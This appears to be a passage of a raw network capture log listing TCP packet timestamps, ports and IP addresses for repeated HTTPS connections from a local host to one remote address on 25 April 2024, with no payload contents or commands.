Apr 25, 2024 14:23:28.065651894 CEST	443	49792	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:28.065853119 CEST	49792	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:28.066494942 CEST	49792	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:28.066831112 CEST	443	49792	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:28.066886902 CEST	49792	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:28.066895962 CEST	443	49792	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:28.066932917 CEST	49792	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:29.229058981 CEST	49793	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:29.229084015 CEST	443	49793	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:29.229218960 CEST	49793	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:29.229736090 CEST	49793	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:29.229748011 CEST	443	49793	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:29.650366068 CEST	443	49793	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:29.652039051 CEST	49793	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:29.652056932 CEST	443	49793	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:29.652121067 CEST	49793	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:29.652127028 CEST	443	49793	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:29.653601885 CEST	443	49793	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:29.653698921 CEST	49793	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:29.662158012 CEST	49793	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:29.662158012 CEST	49793	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:29.662369013 CEST	443	49793	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:29.662486076 CEST	49793	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:30.687526941 CEST	49794	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:30.687557936 CEST	443	49794	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:30.687649965 CEST	49794	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:30.688441992 CEST	49794	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:30.688452959 CEST	443	49794	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:31.107291937 CEST	443	49794	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:31.107453108 CEST	49794	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:31.107466936 CEST	443	49794	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:31.107538939 CEST	49794	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:31.107544899 CEST	443	49794	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:31.111104965 CEST	443	49794	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:31.111177921 CEST	49794	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:31.111589909 CEST	49794	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:31.111687899 CEST	49794	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:31.111934900 CEST	443	49794	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:31.112103939 CEST	49794	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:31.946007967 CEST	49795	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:31.946055889 CEST	443	49795	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:31.946331978 CEST	49795	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:31.947079897 CEST	49795	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:31.947097063 CEST	443	49795	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:32.360492945 CEST	443	49795	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:32.364931107 CEST	49795	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:32.364949942 CEST	443	49795	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:32.365200043 CEST	49795	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:32.365207911 CEST	443	49795	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:32.366983891 CEST	443	49795	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:32.367053986 CEST	49795	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:32.386482954 CEST	49795	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:32.386584997 CEST	49795	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:32.386831999 CEST	443	49795	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:32.386897087 CEST	49795	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:33.344635963 CEST	49796	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:33.344677925 CEST	443	49796	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:33.345340014 CEST	49796	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:33.345940113 CEST	49796	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:33.345971107 CEST	443	49796	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:33.766467094 CEST	443	49796	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:33.766767979 CEST	49796	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:33.766767979 CEST	49796	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:33.766782045 CEST	443	49796	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:33.766791105 CEST	443	49796	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:33.768285990 CEST	443	49796	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:33.768804073 CEST	49796	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:33.768805027 CEST	49796	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:33.768984079 CEST	443	49796	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:33.769040108 CEST	49796	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:33.769048929 CEST	443	49796	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:33.976150036 CEST	443	49796	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:33.976710081 CEST	49796	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:34.799309015 CEST	49797	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:34.799396038 CEST	443	49797	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:34.799475908 CEST	49797	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:34.800276041 CEST	49797	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:34.800311089 CEST	443	49797	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:35.218406916 CEST	443	49797	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:35.220074892 CEST	49797	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:35.220093012 CEST	443	49797	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:35.220325947 CEST	49797	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:35.220331907 CEST	443	49797	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:35.221867085 CEST	443	49797	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:35.221946001 CEST	49797	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:35.227957964 CEST	49797	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:35.228037119 CEST	49797	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:35.228230000 CEST	443	49797	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:35.228455067 CEST	49797	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:36.217794895 CEST	49798	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:36.217868090 CEST	443	49798	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:36.218022108 CEST	49798	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:36.218939066 CEST	49798	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:36.218965054 CEST	443	49798	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:36.643265963 CEST	443	49798	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:36.643708944 CEST	49798	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:36.643728971 CEST	443	49798	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:36.643918037 CEST	49798	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:36.643924952 CEST	443	49798	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:36.645453930 CEST	443	49798	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:36.645518064 CEST	49798	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:36.646208048 CEST	49798	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:36.646378040 CEST	443	49798	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:36.646436930 CEST	49798	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:36.646569967 CEST	49798	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:36.646581888 CEST	443	49798	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:37.967253923 CEST	49799	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:37.967298985 CEST	443	49799	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:37.967462063 CEST	49799	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:37.970288992 CEST	49799	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:37.970299959 CEST	443	49799	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:38.384017944 CEST	443	49799	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:38.384356976 CEST	49799	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:38.384390116 CEST	443	49799	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:38.384658098 CEST	49799	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:38.384665012 CEST	443	49799	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:38.386135101 CEST	443	49799	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:38.386208057 CEST	49799	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:38.387108088 CEST	49799	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:38.387185097 CEST	49799	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:38.387285948 CEST	443	49799	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:38.387341022 CEST	49799	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:39.517905951 CEST	49800	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:39.517937899 CEST	443	49800	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:39.521981001 CEST	49800	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:39.527849913 CEST	49800	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:39.527867079 CEST	443	49800	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:39.943217039 CEST	443	49800	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:39.943715096 CEST	49800	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:39.943715096 CEST	49800	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:39.943733931 CEST	443	49800	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:39.943748951 CEST	443	49800	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:39.945233107 CEST	443	49800	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:39.945692062 CEST	49800	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:39.945976973 CEST	49800	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:39.945977926 CEST	49800	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:39.946171045 CEST	443	49800	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:39.947768927 CEST	49800	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:40.933231115 CEST	49801	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:40.933295965 CEST	443	49801	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:40.933394909 CEST	49801	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:40.933938980 CEST	49801	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:40.933995962 CEST	443	49801	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:41.347320080 CEST	443	49801	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:41.347599030 CEST	49801	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:41.347649097 CEST	443	49801	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:41.347697020 CEST	49801	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:41.347708941 CEST	443	49801	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:41.349173069 CEST	443	49801	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:41.349426031 CEST	49801	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:41.349965096 CEST	49801	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:41.350090027 CEST	49801	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:41.350141048 CEST	443	49801	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:41.350744963 CEST	49801	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:42.392364979 CEST	49802	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:42.392405033 CEST	443	49802	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:42.392467976 CEST	49802	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:42.393227100 CEST	49802	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:42.393239021 CEST	443	49802	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:42.812961102 CEST	443	49802	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:42.813101053 CEST	49802	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:42.813121080 CEST	443	49802	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:42.813204050 CEST	49802	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:42.813213110 CEST	443	49802	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:42.817023039 CEST	443	49802	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:42.817092896 CEST	49802	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:42.817600965 CEST	49802	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:42.817898035 CEST	49802	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:42.817931890 CEST	443	49802	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:42.817990065 CEST	49802	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:43.684014082 CEST	49803	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:43.684043884 CEST	443	49803	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:43.684520006 CEST	49803	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:43.685920954 CEST	49803	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:43.685934067 CEST	443	49803	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:44.106914997 CEST	443	49803	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:44.107203960 CEST	49803	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:44.107222080 CEST	443	49803	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:44.107296944 CEST	49803	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:44.107301950 CEST	443	49803	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:44.108767033 CEST	443	49803	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:44.108913898 CEST	49803	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:44.109442949 CEST	49803	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:44.109442949 CEST	49803	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:44.109596014 CEST	443	49803	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:44.109709024 CEST	49803	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:45.209752083 CEST	49804	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:45.209789038 CEST	443	49804	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:45.209851980 CEST	49804	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:45.210947037 CEST	49804	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:45.210964918 CEST	443	49804	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:45.633613110 CEST	443	49804	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:45.633929014 CEST	49804	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:45.633944035 CEST	443	49804	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:45.633996964 CEST	49804	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:45.634002924 CEST	443	49804	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:45.635499001 CEST	443	49804	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:45.635703087 CEST	49804	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:45.636235952 CEST	49804	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:45.636235952 CEST	49804	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:45.636392117 CEST	443	49804	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:45.638248920 CEST	49804	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:46.568438053 CEST	49805	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:46.568476915 CEST	443	49805	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:46.568537951 CEST	49805	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:46.569042921 CEST	49805	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:46.569056034 CEST	443	49805	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:46.985670090 CEST	443	49805	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:46.985826015 CEST	49805	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:46.985858917 CEST	443	49805	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:46.986004114 CEST	49805	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:46.986010075 CEST	443	49805	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:46.987483978 CEST	443	49805	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:46.987549067 CEST	49805	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:46.987987041 CEST	49805	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:46.988145113 CEST	49805	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:46.988306999 CEST	443	49805	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:46.988460064 CEST	49805	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:47.859836102 CEST	49806	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:47.859869003 CEST	443	49806	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:47.860121012 CEST	49806	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:47.863790035 CEST	49806	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:47.863804102 CEST	443	49806	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:48.277002096 CEST	443	49806	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:48.277190924 CEST	49806	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:48.277190924 CEST	49806	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:48.277199984 CEST	443	49806	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:48.277209044 CEST	443	49806	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:48.278862000 CEST	443	49806	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:48.278918028 CEST	49806	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:48.279551983 CEST	49806	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:48.279758930 CEST	49806	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:48.279778004 CEST	443	49806	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:48.279851913 CEST	49806	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:49.267163038 CEST	49807	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:49.267249107 CEST	443	49807	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:49.267324924 CEST	49807	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:49.267736912 CEST	49807	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:49.267774105 CEST	443	49807	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:49.679675102 CEST	443	49807	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:49.680047989 CEST	49807	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:49.680088043 CEST	443	49807	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:49.680157900 CEST	49807	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:49.680169106 CEST	443	49807	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:49.681066036 CEST	443	49807	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:49.681164980 CEST	49807	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:49.682154894 CEST	49807	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:49.682154894 CEST	49807	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:49.682274103 CEST	443	49807	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:49.682403088 CEST	49807	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:50.674702883 CEST	49808	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:50.674793959 CEST	443	49808	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:50.674887896 CEST	49808	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:50.675407887 CEST	49808	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:50.675445080 CEST	443	49808	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:51.089101076 CEST	443	49808	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:51.093998909 CEST	49808	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:51.094055891 CEST	443	49808	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:51.094204903 CEST	49808	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:51.094218969 CEST	443	49808	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:51.095279932 CEST	443	49808	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:51.095343113 CEST	49808	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:51.096183062 CEST	49808	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:51.096309900 CEST	443	49808	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:51.096324921 CEST	49808	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:51.096339941 CEST	443	49808	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:51.096369982 CEST	49808	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:52.064697981 CEST	49809	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:52.064728975 CEST	443	49809	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:52.067881107 CEST	49809	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:52.068613052 CEST	49809	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:52.068624973 CEST	443	49809	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:52.481312990 CEST	443	49809	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:52.481554985 CEST	49809	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:52.481564999 CEST	443	49809	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:52.481653929 CEST	49809	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:52.481658936 CEST	443	49809	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:52.482676029 CEST	443	49809	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:52.482733965 CEST	49809	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:52.483612061 CEST	49809	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:52.483705997 CEST	49809	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:52.483736992 CEST	443	49809	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:52.483778954 CEST	49809	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:53.545866013 CEST	49810	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:53.545912981 CEST	443	49810	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:53.550009012 CEST	49810	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:53.550667048 CEST	49810	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:53.550681114 CEST	443	49810	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:53.964342117 CEST	443	49810	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:53.981806040 CEST	49810	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:53.981818914 CEST	443	49810	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:53.984529018 CEST	49810	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:53.984534979 CEST	443	49810	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:53.986412048 CEST	443	49810	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:53.986567974 CEST	49810	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:53.988382101 CEST	49810	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:53.988534927 CEST	49810	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:53.988615990 CEST	443	49810	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:53.988760948 CEST	49810	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:55.047029972 CEST	49811	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:55.047070980 CEST	443	49811	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:55.047132015 CEST	49811	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:55.048413992 CEST	49811	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:55.048424006 CEST	443	49811	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:55.462136984 CEST	443	49811	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:55.462321043 CEST	49811	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:55.462336063 CEST	443	49811	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:55.462394953 CEST	49811	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:55.462399006 CEST	443	49811	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:55.464302063 CEST	443	49811	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:55.464426041 CEST	49811	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:55.464876890 CEST	49811	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:55.464878082 CEST	49811	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:55.465039015 CEST	443	49811	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:55.468059063 CEST	49811	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:56.529737949 CEST	49812	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:56.529786110 CEST	443	49812	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:56.529848099 CEST	49812	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:56.534281015 CEST	49812	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:56.534295082 CEST	443	49812	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:56.950721025 CEST	443	49812	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:56.950903893 CEST	49812	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:56.950932026 CEST	443	49812	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:56.951172113 CEST	49812	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:56.951175928 CEST	443	49812	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:56.954811096 CEST	443	49812	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:56.954886913 CEST	49812	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:56.955815077 CEST	49812	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:56.955905914 CEST	49812	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:56.956330061 CEST	443	49812	193.228.196.69	192.168.2.7
Apr 25, 2024 14:23:56.956387043 CEST	49812	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:57.873951912 CEST	49813	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:23:57.873975992 CEST	443	49813	193.228.196.69	192.168.2.7
